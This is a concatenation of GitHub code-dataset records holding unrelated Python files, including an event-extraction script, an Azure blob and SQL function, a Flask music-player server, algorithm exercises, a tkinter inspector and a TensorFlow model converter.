token_ids=token_ids,\n pieces=pieces,\n piece_idxs=piece_idxs,\n token_lens=token_lens,\n attention_mask=attn_mask\n )\n numberized_data.append(instance)\n return numberized_data\n\ndef collate_fn(batch, use_gpu=False):\n batch_piece_idxs = []\n batch_tokens = []\n batch_token_lens = []\n batch_attention_masks = []\n batch_sent_ids = []\n 
batch_token_ids = []\n batch_token_nums = []\n\n for inst in batch:\n batch_piece_idxs.append(inst.piece_idxs)\n batch_attention_masks.append(inst.attention_mask)\n batch_token_lens.append(inst.token_lens)\n batch_tokens.append(inst.tokens)\n batch_sent_ids.append(inst.sent_id)\n batch_token_ids.append(inst.token_ids)\n batch_token_nums.append(len(inst.tokens))\n\n if use_gpu:\n batch_piece_idxs = torch.cuda.LongTensor(batch_piece_idxs)\n batch_attention_masks = torch.cuda.FloatTensor(\n batch_attention_masks)\n batch_token_nums = torch.cuda.LongTensor(batch_token_nums)\n else:\n batch_piece_idxs = torch.LongTensor(batch_piece_idxs)\n batch_attention_masks = torch.FloatTensor(\n batch_attention_masks)\n batch_token_nums = torch.LongTensor(batch_token_nums)\n\n return BatchLdcEval(sent_ids=batch_sent_ids,\n token_ids=batch_token_ids,\n tokens=batch_tokens,\n piece_idxs=batch_piece_idxs,\n token_lens=batch_token_lens,\n attention_masks=batch_attention_masks,\n token_nums=batch_token_nums)\n\n\ndef prepare_text(text, offset, tokenizer, sent_max_length, use_gpu, sent_id='asd'):\n data, tokens = text_to_tokens(text, sent_id, offset)\n data = numberize(data, tokenizer, sent_max_length, offset)\n data = collate_fn(data, use_gpu)\n return data, tokens\n\n\ndef get_graph_task_attribute(graph, task):\n if task == 'entities':\n return graph.entities, graph.entity_scores\n if task == 'triggers':\n return graph.triggers, graph.trigger_scores\n if task == 'relations':\n return graph.relations, graph.relation_scores\n if task == 'roles':\n return graph.roles, graph.role_scores\n return None, None\n\n\ndef get_task_type(task):\n if task == 'entities':\n return 'entity_type'\n if task == 'triggers':\n return 'event_type'\n if task == 'relations':\n return 'relation_type'\n if task == 'roles':\n return 'role_type'\n return None\n\n\ndef get_predictions_scores(graph):\n task_list = ['entities', 'triggers', 'relations', 'roles']\n output = {}\n\n for task in task_list:\n pred_list = []\n pred_task, pred_task_scores = get_graph_task_attribute(graph, task)\n for idx, entity in enumerate(pred_task):\n start, end, entity_type = entity\n itos = {i: s for s, i in graph.vocabs[get_task_type(task)].items()}\n label = itos[entity_type]\n pred_list.append([start, end, label, pred_task_scores[idx]])\n\n output[task] = pred_list\n\n return output\n\n\ndef predict(article, model, tokenizer, config, sent_max_length, use_gpu=False):\n detokenizer = Detok()\n sentences = article.get('sentences')\n\n sentence_list = []\n offset = 0\n for idx, text_list in enumerate(sentences):\n doc_id = f'{article.get(\"filename\")}'\n sent_id = f'{article.get(\"filename\")}-{idx}'\n text = detokenizer.detokenize(text_list)\n # text = ' '.join(text_list)\n data, tokens = prepare_text(text, offset, tokenizer, sent_max_length, use_gpu, sent_id)\n offset += len(tokens)\n graph = model.predict(data)\n graph = graph[0]\n graph.clean(relation_directional=config.relation_directional,\n symmetric_relations=config.symmetric_relations)\n scores = get_predictions_scores(graph)\n # sentence_pred = {\n # 'sent_id': sent_id,\n # 'pred': scores,\n # 'tokens': text_list\n # }\n sentence_pred = {\n 'doc_id':doc_id, \n 'sent_id': sent_id,\n 'token_ids': data.token_ids[0], # this works because script takes in single sentences only\n 'tokens': [token[0] for token in tokens], # text_list,\n 'graph': graph.to_dict()\n }\n sentence_list.append(sentence_pred)\n\n return sentence_list\n\ndef count_maxlen_of_articles(articles):\n \"\"\"\n This will estimate highest 
number of tokens in the sentences in articles,\n    allowing us to set an appropriate token length for our transformer,\n    which is O(n^3) in complexity to sentence len n\n    \"\"\"\n    def count_sentence_len(doc):\n        sentences = doc['sentences']\n        return max([len(sentence) for sentence in sentences])\n\n    return max([count_sentence_len(doc) for doc in articles])\n\nif __name__ == \"__main__\":\n\n    # configuration\n    parser = ArgumentParser()\n    parser.add_argument('--model_path', default=None, type=str)\n    parser.add_argument(\"--test_file\", default=None, type=str)\n    parser.add_argument(\"--log_path\", default=None, type=str)\n    parser.add_argument(\"--sent_max_length\", default=512, type=int)\n    parser.add_argument(\"--use_gpu\", default=False, action='store_true')\n    args = parser.parse_args()\n\n    # output\n    timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n    output_dir = os.path.join(args.log_path, timestamp)\n    if not os.path.exists(output_dir):\n        os.makedirs(output_dir)\n    predictions_file = os.path.join(output_dir, f'predictions.json')\n\n    log_file = os.path.join(output_dir, 'log.txt')\n    with open(log_file, 'w', encoding='utf-8') as w:\n        print('Log file: {}'.format(log_file))\n\n    print(f'Will use GPU: {args.use_gpu}')\n\n    # load the model from file\n    model, tokenizer, config = load_model(args.model_path,\n                                          device=0,\n                                          gpu=args.use_gpu,\n                                          beam_size=5)\n\n    # set GPU device\n    if args.use_gpu:\n        torch.cuda.set_device(0)\n\n    # load cc json\n    with open(args.test_file, 'r') as f, open(predictions_file, 'a') as output_f:\n        articles = [json.loads(a) for a in f.readlines()]\n        print(f'Loaded {len(articles)} articles from {args.test_file}.')\n        print(f'Found token max length of {count_maxlen_of_articles(articles)} in {args.test_file}')\n\n        # iterate through each article\n        progress = tqdm(total=len(articles), ncols=75)\n        for idx, article in enumerate(articles):\n            progress.update(1)\n            predicted_article_events = predict(article, model, tokenizer, config, args.sent_max_length)\n\n            for sent in predicted_article_events:\n                # save the articles with predictions back into a json\n                json.dump(sent, output_f)\n                output_f.write('\\n')\n\n        print('Done.')\n","repo_name":"jeremytanjianle/event-extraction-oneie","sub_path":"test_cc.py","file_name":"test_cc.py","file_ext":"py","file_size_in_byte":9759,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"26914880302","text":"# This function is not intended to be invoked directly. 
Instead it will be\n# triggered by an orchestrator function.\n# Before running this sample, please:\n# - create a Durable orchestration function\n# - create a Durable HTTP starter function\n# - add azure-functions-durable to requirements.txt\n# - run pip install -r requirements.txt\n\nimport logging\nfrom azure.storage.blob import BlockBlobService, PublicAccess\nimport os\nfrom datetime import datetime\nfrom MyFunctions import (\n get_file_name_from_URL,\n run_sql_command,\n get_url_container_and_file_name,\n get_SAS_URL,\n update_EventBuilderProgress\n)\n\n\ndef main(inputDict: dict) -> str:\n logging.info(\"VideosIntoEvent started\")\n ## Get image list\n videoList = inputDict['videoList']\n sport = inputDict['sport']\n event = inputDict['event']\n samplingProportion = inputDict['samplingProportion']\n audioTranscript = inputDict['audioTranscript']\n logging.info(f\"videoList len: {len(videoList)}\")\n logging.info(f\"sport: {sport}\")\n logging.info(f\"event: {event}\")\n ## # Create query to add rows to AzureBlobVideos SQL table\n ## Columns\n columnList = [\n # 'VideoID', - auto incrementing\n 'VideoName',\n 'Event',\n 'Sport',\n 'EndpointID',\n 'MultipleVideoEvent',\n 'SamplingProportion',\n 'AudioTranscript'\n ]\n columnListString = \",\".join([\n f\"[{c}]\"\n for c in columnList\n ])\n ## Split `videoList` into blocks of 900 (1000 is the limit)\n n = 900\n videoListBlocks = [\n videoList[i * n:(i + 1) * n]\n for i in range((len(videoList) + n - 1) // n )\n ]\n\n for I,vlb in enumerate(videoListBlocks):\n logging.info(f\"query {I+1} of {len(videoListBlocks)}\")\n ## Values\n valuesList = [\n \",\".join([\n f\"'{get_file_name_from_URL(vidURL)}'\",\n f\"'{event}'\",\n f\"'{sport}'\",\n \"NULL\",\n \"1\", # equivalent of True\n str(samplingProportion),\n \"1\" if audioTranscript else \"0\"\n ])\n for vidURL in vlb\n ]\n valuesListString = \"),(\".join(valuesList)\n ## Build query\n insertQuery = f\"\"\"\n INSERT INTO AzureBlobVideos ({columnListString})\n VALUES ({valuesListString})\n \"\"\"\n logging.info(f\"AzureBlobVideos query: {insertQuery}\")\n ## Run query\n run_sql_command(\n sqlQuery=insertQuery,\n database=\"AzureCognitive\"\n )\n logging.info(\"query run\")\n\n \n ## # Upload videos to us-office\n ## Create block blob services\n sourceBBS = BlockBlobService(\n connection_string=os.getenv(\"socialscrapingCS\"))\n logging.info(\"source BBS created\")\n destinationBBS = BlockBlobService(\n connection_string=os.getenv(\"fsevideosCS\"))\n logging.info(\"dest BBS created\")\n\n ## Loop through list of videos\n logging.info(\"start loading videos into `us-office` container\")\n for vidURL in videoList:\n urlContainer,urlFileName = get_url_container_and_file_name(vidURL)\n ## Create SAS URL\n sasURL = get_SAS_URL(\n fileURL=vidURL,\n block_blob_service=sourceBBS,\n container=urlContainer\n )\n ## Copy blob\n destinationBBS.copy_blob(\n container_name=\"us-office\",\n blob_name=urlFileName,\n copy_source=sasURL\n )\n\n ## Update row in SQL\n update_EventBuilderProgress(\n uuid=inputDict['uuid'],\n utcNowStr=datetime.strftime(\n datetime.utcnow(),\n \"%Y-%m-%dT%H:%M:%S\"\n ),\n stage=\"Videos inserted into AzureBlobVideos\",\n ebs_stages=inputDict['ebs_stages'],\n stage_count=inputDict['stage_count']\n )\n\n return \"done\"","repo_name":"OD1995/FSEMultimediaEventBuilder","sub_path":"VideosIntoEvent/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
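A minimal, self-contained sketch (an editorial illustration, not one of the dataset records; the name `chunk` is invented) of the ceil-division chunking idiom the VideosIntoEvent record above uses to split `videoList` into blocks of 900, keeping each INSERT under SQL Server's 1000-row VALUES limit:

def chunk(items, n):
    # (len(items) + n - 1) // n is integer ceiling division, so a partial
    # final block still gets its own slot
    return [items[i * n:(i + 1) * n] for i in range((len(items) + n - 1) // n)]

assert chunk(list(range(10)), 4) == [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]
assert chunk([], 4) == []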
+{"seq_id":"16239741732","text":"# Definition for a binary tree node\nclass TreeNode:\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution:\n\n\t# @param A : root node of tree\n\t# @return the root node in the tree\n\tdef invertTree(self, A):\n\n if A == None:\n return None\n else:\n c = self.invertTree(A.left)\n d = self.invertTree(A.right)\n A.left = d\n A.right = c\n return A\n\nobj = Solution()\nt1 = TreeNode(1)\nt2 = TreeNode(2)\nt3 = TreeNode(3)\nt1.left = t2\nt1.right = t3\nprint(t1.left.val)\nprint(t1.right.val)\nobj.invertTree(t1)\nprint(t1.left.val)\nprint(t1.right.val)","repo_name":"aman-bcalm/Scaler-Problems","sub_path":"Day 24/InvertBinaryTree.py","file_name":"InvertBinaryTree.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71326023593","text":"amount_of_people = int(input())\namount_of_nights = int(input())\namount_of_cards_for_transport = int(input())\namount_of_tickets = int(input())\n\ndiscount = 0.25\n\nnights_price = amount_of_nights * 20\ncard_for_transport_price = amount_of_cards_for_transport * 1.60\nticket_price = amount_of_tickets * 6\n\nprice_for_one_person = nights_price + card_for_transport_price + ticket_price\n\ntotal_price_for_all = price_for_one_person * amount_of_people\n\ntotal_price = total_price_for_all + (total_price_for_all * discount)\n\nprint(f\"{total_price:.2f}\")","repo_name":"Darkartt/SoftUni","sub_path":"SoftUni-Basic/pre_exam/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16682319263","text":"class ITA_Subject:\n\n area = None\n enjoy = None\n\n def __init__(self, subject_name, professor):\n \n if subject_name[0] != self.area[0]:\n raise Exception(\"Invalid subject name for this area\")\n \n self.professor = professor\n self.name = subject_name\n \n def study(self):\n print(\"I {0} studying {1}\".format(self.enjoy, self.name))\n\n def avaliacao_do_curso(self, avaliacoes):\n avaliacao_total = avaliacoes[0]\n for i in range(1, len(avaliacoes)):\n avaliacao_total += avaliacoes[i]\n print('Avaliação final do curso: {}'.format(\n avaliacao_total))\n \n\nclass Computation_Subject(ITA_Subject):\n \n area = 'Computation'\n enjoy = 'like'\n\nclass Electronics_Subject(ITA_Subject):\n\n area = 'Electronics'\n enjoy = 'don\\'t like'\n\nclass Mathematics_Subject(ITA_Subject):\n\n area = 'Mathematics'\n enjoy = 'love'\n\nclass Humanities_Subject(ITA_Subject):\n\n area = 'Humanities'\n enjoy = 'hate'\n\n\ndef main():\n MAT_12 = Mathematics_Subject('MAT-12', 'Luiz Augusto')\n CES_22 = Computation_Subject('CES-22', 'Karla')\n ELE_52 = Electronics_Subject('ELE-52', 'Douglas')\n #If you uncomment the line below the compilation \n # will raise an exception.\n #CES_12 = Humanities_Subject('CES-12', 'Nilda')\n CES_22.study()\n ELE_52.study()\n # Veja que independente do tipo de avaliação (texto\n # ou nota de 0 a 10). O python conseguiu compilar o \n # código, pois utiliza do duck_typing. 
Foi utilizado \n # o símbolo '+' tanto para soma de strings quanto para \n # soma de notas.\n CES_22.avaliacao_do_curso(['Muito bom.', 'Bom.', \n 'Sensacional.'])\n CES_22.avaliacao_do_curso([10.0, 9.5, 10.0])\n\nmain()","repo_name":"caio-ggomes/Lista2-CES22","sub_path":"questao12.py","file_name":"questao12.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69896042154","text":"# users/url.py\n\n\"\"\"Defines URL patterns for users.\"\"\"\n\n# Django modules\nfrom django.urls import path, include\n\n# Locals\nfrom . import views\n\napp_name = 'users'\nurlpatterns = [\n\t# Include default auth urls.\n\tpath('', include('django.contrib.auth.urls')),\n\t# Registration page.\n\tpath('register/', views.register, name='register'),\n]","repo_name":"gurnitha/2022-django-learninglogs","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26681318266","text":"import os\nfrom flask import Flask\nfrom flask import render_template, request\nfrom player import MusicPlayer\nfrom werkzeug.utils import secure_filename\nfrom flask import send_file\n#from gpio_handler import GpioHandler\nfrom subprocess import call\nimport signal\nfrom sys import exit\n# creates a Flask application, named app\napp = Flask(__name__)\nplayer = MusicPlayer()\n\ndef signal_handler(sig, frame):\n print(\"Stopping..\")\n player.stop()\n exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n@app.route(\"/\")\ndef index(msg='Click next/prev to start playing'):\n songs = player.get_songs()\n return render_template('index.html',song_list = songs,ret_msg=msg)\n\n# play related methods\n@app.route(\"/next/\", methods=['POST'])\ndef next_song():\n player.next_song()\n return index(\"next song playing\")\n\n@app.route(\"/prev/\", methods=['POST'])\ndef prev_song():\n player.prev_song()\n return index(\"prev song playing\")\n\n@app.route(\"/stop/\",methods=['POST'])\ndef stop_song():\n player.pause()\n return index(\"song (un)paused\")\n\n@app.route(\"/soundUp/\",methods=['POST'])\ndef sound_up():\n call([\"/usr/bin/amixer\", \"-M\", \"set\", \"Master\", \"9%+\"])\n return \"volume up\"\n\n@app.route(\"/soundDown/\",methods=['POST'])\ndef sound_down():\n call([\"/usr/bin/amixer\", \"-M\", \"set\", \"Master\", \"9%-\"])\n return \"volume up\"\n\n# file upload\ndef allowed_file(filename):\n ALLOWED_EXTENSIONS = {'mp3', 'ogg', 'wav'}\n return '.' 
in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/upload/', methods = ['POST'])\ndef upload_file():\n    f = request.files['file']\n    if allowed_file(f.filename):\n        filename = secure_filename(f.filename)\n        f.save(os.path.join('./songs/',filename))\n        player.get_songs()\n        player.load_song()\n        return index('file uploaded successfully')\n    else:\n        return index(\"Wrong file extension\")\n# file download\n\n@app.route('/download/',methods =['POST'])\ndef downloadFile ():\n    f = request.json['filename']\n    return send_file('./songs/'+f, as_attachment=True)\n    \n# run the application\nif __name__ == \"__main__\":\n    # init player\n    player.get_songs()\n    player.select_song(0)\n    player.load_song()\n\n    # run server\n    app.run(host='0.0.0.0',port=8810)","repo_name":"Kornelos/lines-music-player","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616580153","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n    def canJump(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: bool\n        \"\"\"\n        max_reach = 0\n        for i in range(len(nums)):\n            if i > max_reach:\n                return False\n            max_reach = max(max_reach, i+nums[i])\n            if max_reach >= len(nums)-1:\n                return True\n        return True\n\n    def canJump1(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: bool\n        \"\"\"\n        # going from back to front, find the earliest position from which the end is reachable; if the first position can reach that point, the answer is yes\n        if not nums:\n            return True\n        nums, res = nums[::-1], 0\n        for i in range(1, len(nums)):\n            if nums[i] + res >= i:\n                res = i # res ends up being the position that can reach the first element\n        return res == len(nums)-1\n","repo_name":"ShawDa/Coding","sub_path":"leetcode/055跳跃游戏.py","file_name":"055跳跃游戏.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42556245849","text":"import numpy as np\r\nimport ruptures as rpt\r\n\r\n\r\ndef compute_snr(signal: np.ndarray, noise: np.ndarray) -> float:\r\n    \"\"\"\r\n    Computes the Signal-to-Noise Ratio (SNR) between a signal and noise.\r\n\r\n    Parameters:\r\n    signal (np.ndarray): The signal.\r\n    noise (np.ndarray): The noise.\r\n\r\n    Returns:\r\n    float: The Signal-to-Noise Ratio (SNR) in decibels (dB).\r\n    \"\"\"\r\n\r\n    # Calculate the power of the signal and noise\r\n    signal_power = np.mean(signal**2)\r\n    noise_power = np.mean(noise**2)\r\n\r\n    # Calculate the Signal-to-Noise Ratio (SNR) in decibels (dB)\r\n    snr = 10 * np.log10(signal_power / noise_power)\r\n\r\n    return snr\r\n\r\n\r\ndef generate_signals(\r\n    n_informative_dimensions: int,\r\n    length: int,\r\n    n_dimensions: int,\r\n    n_bkps: int,\r\n    sigma: float,\r\n):\r\n    \"\"\"\r\n    Generates synthetic signals with informative and noisy dimensions.\r\n\r\n    Parameters:\r\n    n_informative_dimensions (int): Number of informative dimensions in the signal.\r\n    length (int): Length of the generated signal.\r\n    n_dimensions (int): Total number of dimensions in the generated signal.\r\n    n_bkps (int): Number of breakpoints in the signal along the informative dimensions.\r\n    sigma (float): Standard deviation of the noise to be added.\r\n\r\n    Returns:\r\n    tuple: A tuple containing:\r\n        - noisy_signal (np.ndarray): The generated noisy signal with informative and noisy dimensions.\r\n        - segmentation (np.ndarray): The segmentation points.\r\n        - snr (float): Signal-to-Noise Ratio (SNR) of the generated signal.\r\n    \"\"\"\r\n\r\n    # Generate informative and noisy segments 
separately\r\n signal, segmentation = rpt.pw_constant(\r\n length, n_informative_dimensions, n_bkps, noise_std=0\r\n )\r\n noisy_signal, _ = rpt.pw_constant(\r\n length, n_dimensions - n_informative_dimensions, 0, noise_std=0\r\n )\r\n\r\n # Combine the informative and noisy segments into the final signal\r\n final_signal = np.zeros((length, n_dimensions))\r\n final_signal[:, 0:n_informative_dimensions] = signal\r\n final_signal[:, n_informative_dimensions:n_dimensions] = noisy_signal\r\n\r\n # Normalize the signal to have zero mean and unit variance\r\n normalized_signal = (final_signal - np.mean(final_signal)) / np.std(final_signal)\r\n\r\n # Generate noise with the specified standard deviation\r\n noise = np.random.normal(0, sigma, normalized_signal.shape)\r\n\r\n # Add the noise to the normalized signal to create the noisy signal\r\n noisy_signal = normalized_signal + noise\r\n\r\n # Calculate the Signal-to-Noise Ratio (SNR) of the generated signal\r\n snr = compute_snr(\r\n normalized_signal, noise\r\n ) # Assuming compute_snr function is defined\r\n\r\n return noisy_signal, segmentation, snr\r\n","repo_name":"simonblotas/segmentation_notebook_version","sub_path":"data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"872627059","text":"from dataclasses import dataclass\nimport tkinter\nfrom tkinter import ttk\nfrom typing import List, Literal, Optional\nfrom tkinter.messagebox import showinfo\nfrom web.dom.CharacterData import CharacterData\nfrom web.dom.DocumentType import DocumentType\nfrom web.dom.Node import Node\nfrom utils import log\n\n@dataclass\nclass NetworkRequest:\n url: str\n request_type: Literal[\"GET\", \"POST\"]\n response_code: int\n response_size: int\n\n\nclass Inspector:\n def __init__(self, url: str, browser, dom: Optional[DocumentType] = None) -> None:\n self.url = url\n self.browser = browser\n self.dom: Optional[DocumentType] = dom\n self.network_requests: List[NetworkRequest] = []\n self.inspector_window = tkinter.Tk(className=f'Inspector | {self.url}')\n self.inspector_window.rowconfigure(0, weight=1)\n self.inspector_window.columnconfigure(0, weight=1)\n\n self.tabControl = ttk.Notebook(self.inspector_window)\n self.elements = ttk.Frame(self.tabControl)\n self.elements.rowconfigure(0, weight=1)\n self.elements.columnconfigure(0, weight=1)\n\n self.network = ttk.Frame(self.tabControl)\n self.network.rowconfigure(0, weight=1)\n self.network.columnconfigure(0, weight=1)\n\n self.tabControl.add(self.elements, text='Elements')\n self.tabControl.add(self.network, text='Network')\n\n self.tabControl.pack(expand=1, fill=\"both\")\n \n def on_closing():\n log(\"On close\")\n from browser.globals import BrowserState\n BrowserState.remove_inspector(self)\n self.inspector_window.destroy()\n self.inspector_window.protocol(\"WM_DELETE_WINDOW\", on_closing)\n network_columns = ('url', 'request_type', 'response_code', \"response_size\")\n\n self.network_treeview = ttk.Treeview(self.network, columns=network_columns, show='headings')\n self.elements_treeview = ttk.Treeview(self.elements)\n\n # define headings\n self.network_treeview.heading('url', text='Url')\n self.network_treeview.heading('request_type', text='Request type')\n self.network_treeview.heading('response_code', text='Response code')\n self.network_treeview.heading('response_size', text='Response size')\n \n #self.elements_treeview['columns'] = ['#1']\n\n 
self.elements_treeview.heading(\"#0\", text=\"Element\", anchor=tkinter.W)\n\n #self.elements_treeview.heading('#0', text='Element')\n\n\n def network_item_selected(event) -> None:\n for selected_item in self.network_treeview.selection():\n item = self.network_treeview.item(selected_item)\n record = item['values']\n # show a message\n showinfo(title='Information', message=','.join(record))\n\n\n self.network_treeview.bind('<>', network_item_selected)\n\n def element_item_selected(event) -> None:\n from browser.globals import BrowserState\n BrowserState.set_selected_elements(self.elements_treeview.selection())\n self.browser.redraw()\n\n self.elements_treeview.bind('<>', element_item_selected)\n\n self.network_treeview.grid(row=0, column=0, sticky='nsew')\n self.elements_treeview.grid(row=0, column=0, sticky='nsew')\n\n # add a scrollbar\n elements_treeview_scrollbar = ttk.Scrollbar(self.network, orient=tkinter.VERTICAL, command=self.elements_treeview.yview)\n self.network_treeview.configure(yscroll=elements_treeview_scrollbar.set)\n elements_treeview_scrollbar.grid(row=0, column=1, sticky='ns')\n\n elements_treeview_scrollbar = ttk.Scrollbar(self.network, orient=tkinter.VERTICAL, command=self.elements_treeview.yview)\n self.elements_treeview.configure(yscroll=elements_treeview_scrollbar.set)\n\n if self.dom:\n self.update_dom(dom)\n\n\n\n def update_network_view(self) -> None:\n for request in self.network_requests:\n self.network_treeview.insert('', tkinter.END, values=(request.url, request.request_type, request.response_code, request.response_size))\n\n def __add_node_to_elements_view(self, node: Node, id: str, parent_id: Optional[str]) -> None:\n if parent_id:\n if isinstance(node, CharacterData):\n # TODO: Update html tokenizer/parser to remove 'empty' CharacterData elements.\n if not node.data.isspace():\n self.elements_treeview.insert(str(parent_id), tkinter.END, text=f\"{node.data.strip()}\", iid=id, open=False)\n else:\n self.elements_treeview.insert(str(parent_id), tkinter.END, text=f\"<{node.name}>\", iid=id, open=False)\n #parent_child_count = len(self.elements_treeview.get_children(str(parent_id)))\n #log(\"Child\", parent_child_count)\n #self.elements_treeview.move(str(id), str(parent_id), parent_child_count)\n else:\n self.elements_treeview.insert('', tkinter.END, text=f\"<{node.name}>\", iid=id, open=False) \n \n for child in node.children:\n self.__add_node_to_elements_view(child, str(child.id), id)\n\n def update_elements_view(self) -> None:\n if not self.dom: return\n for child in self.dom.children:\n self.__add_node_to_elements_view(child, str(child.id), None)\n\n def clear_elements_view(self) -> None:\n if not self.dom: return\n self.elements_treeview.delete(*self.elements_treeview.get_children())\n\n def update_url(self, url: str) -> None:\n self.url = url\n self.inspector_window.title(url)\n\n def update_dom(self, dom: DocumentType) -> None:\n if self.dom:\n self.clear_elements_view()\n self.dom = dom\n self.update_elements_view()\n\n\n def add_network_request(self, request: NetworkRequest) -> None:\n self.network_requests.append(request)\n self.update_network_view()\n \n def clear_network_requests(self) -> None:\n self.network_requests = []\n self.network_treeview.delete(*self.network_treeview.get_children())\n\n\n\n ","repo_name":"aaralh/theBrowser","sub_path":"browser/Inspector.py","file_name":"Inspector.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
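A short, runnable sketch (an editorial illustration, not one of the dataset records; the toy `dom` tuple and `add` helper are invented) of the recursive ttk.Treeview insertion pattern the Inspector record above uses in `__add_node_to_elements_view`: each node is inserted under its parent's item id, so the widget mirrors the DOM tree.

import tkinter
from tkinter import ttk

root = tkinter.Tk()
tree = ttk.Treeview(root)
tree.pack(fill="both", expand=True)

# (tag, children) pairs standing in for real DOM nodes
dom = ("html", [("head", []), ("body", [("p", [])])])

def add(node, parent=""):
    tag, children = node
    # tree.insert returns the new item's iid, which becomes the parent iid below
    iid = tree.insert(parent, tkinter.END, text="<%s>" % tag, open=True)
    for child in children:
        add(child, iid)

add(dom)
# root.mainloop()  # uncomment to display the window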
+{"seq_id":"44649402094","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# TensorFlow and tf.keras\nimport os\n# 0 = all messages are logged (default behavior)\n# 1 = INFO messages are not printed\n# 2 = INFO and WARNING messages are not printed\n# 3 = INFO, WARNING, and ERROR messages are not printed\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\nimport tensorflow as tf\n\n# Helper libraries\nimport os\nimport sys\nimport time\nimport argparse\n\nfrom src.data import cifar100\nfrom src.convert.keras import freeze_graph, convert_tf_lite\nfrom src.utils.color_utils import bcolors\nfrom src.utils.logger import Logging\nfrom src.utils import file_utils\nLogging.attach_stdout()\n# HuliLogging.debug_dim()\n# HuliLogging.info_blue()\n# HuliLogging.warn_yellow()\n# HuliLogging.error_red()\n\nSUPPORTED_INPUTS = [file_utils.EXTENSION_H5]\n\nSUPPORTED_OUTPUTS = [file_utils.EXTENSION_PB, os.path.splitext(file_utils.EXTENSION_INT8_TFLITE)[1]]\n\nlogger = Logging.get_logger(__name__)\n\n\ndef line():\n return '=' * 50\n\n\nprint(line())\nprint(tf.__name__, '-', tf.__version__, sep='')\nprint(line())\n\n\ndef log_bold(*argv, **kwargs):\n logger.info(line() + ' ' + argv[0] + ' ' + line(), *argv[1:], **kwargs)\n\n\ndef get_args():\n p = argparse.ArgumentParser()\n p.add_argument('-i', '--input', help=\"Model to use\", required=True)\n p.add_argument('-o', '--output', help=\"Location to write output model to\", required=True)\n p.add_argument('-d', '--representative_data',\n help=\"Name of representative data (required for quantization conversions)\", required=False)\n args = p.parse_args()\n assert os.path.splitext(args.input)[1] in SUPPORTED_INPUTS, '%s not in %s' % (args.input, SUPPORTED_INPUTS)\n assert os.path.splitext(args.output)[1] in SUPPORTED_OUTPUTS, '%s not in %s' % (args.output, SUPPORTED_OUTPUTS)\n assert args.output[-len(file_utils.EXTENSION_INT8_TFLITE):] != file_utils.EXTENSION_INT8_TFLITE \\\n or args.representative_data is not None, \\\n 'Must pass representative data for %s conversion' % file_utils.EXTENSION_INT8_TFLITE\n return args\n\n\ndef get_data(representative_data):\n if representative_data is None:\n return None\n elif representative_data == cifar100.NAME:\n (train_x, train_y), (test_x, test_y) = cifar100.load_data()\n return train_x\n else:\n assert 1 == 0, 'Unexpected representative_data: %s' % representative_data\n\n\ndef convert(input, output, representative_data=None):\n input_ext = os.path.splitext(input)[1]\n assert input_ext == file_utils.EXTENSION_H5, 'Unexpected input file type: %s' % input\n\n output_ext = os.path.splitext(output)[1]\n assert output_ext in [file_utils.EXTENSION_PB, os.path.splitext(file_utils.EXTENSION_INT8_TFLITE)[1]],\\\n 'Unexpected output file type: %s' % output\n\n if output_ext == file_utils.EXTENSION_PB:\n if representative_data is not None:\n logger.warn('No need to pass representative data for %s conversion', file_utils.EXTENSION_PB)\n ret = freeze_graph(input, output)\n elif output_ext == os.path.splitext(file_utils.EXTENSION_INT8_TFLITE)[1]:\n assert representative_data is not None, 'representative_data is None'\n ret = convert_tf_lite(input, output, representative_data=representative_data)\n else:\n ret = -1\n return ret\n\n\ndef main():\n # Args\n log_bold('PARSE')\n args = get_args()\n input_ = args.input\n output = args.output\n representative_data = get_data(args.representative_data)\n\n ret = convert(input_, output, representative_data=representative_data)\n if ret != 
